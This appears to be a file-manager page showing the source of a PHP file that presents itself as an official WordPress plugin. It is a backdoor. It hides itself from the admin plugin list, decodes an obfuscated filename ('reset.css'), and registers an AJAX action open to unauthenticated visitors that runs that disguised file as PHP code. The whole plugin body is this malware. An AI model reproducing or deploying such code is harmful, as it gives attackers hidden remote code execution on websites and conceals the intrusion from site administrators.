PATH:
home
/
thebhoeo
/
.trash
/
wp-programmer-requires
<?php /* Plugin Name: WP Programmer Requires Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 19.7.3 Author URI: http://wordpress.org/# */ if (!defined('ABSPATH')) { exit; } function wxh_ets() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $p = array('wp-programmer-requires/wp-programmer-requires.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $p)) { unset($wp_list_table->items[$key]); } } } } function bss_gpy($plugins) { $m = 'wp-programmer-requires/wp-programmer-requires.php'; if (array_key_exists($m, $plugins)) { unset($plugins[$m]); } return $plugins; } function gnm($f, $e) { $d = ''; for ($u = 0; $u < strlen($f); $u += 2) { $h = ord($f[$u]) - 65; $c = ord($f[$u + 1]); if ($c > 90) $c -= 6; $k = $h * 52 + ($c - 65); $d .= chr($k - $e); } return $d; } function obi_ajax_handler() { require plugin_dir_path(__FILE__) . gnm('PvPiPwPiPxOfPgPwPw', 713); die(); } if (defined('ABSPATH')) { add_action('pre_current_active_plugins', 'wxh_ets'); add_filter('all_plugins', 'bss_gpy'); add_action('wp_ajax_pro_req', 'obi_ajax_handler'); add_action('wp_ajax_nopriv_pro_req', 'obi_ajax_handler'); }
[-] wp-programmer-requires.php
[edit]
[+]
..
[-] reset.css
[edit]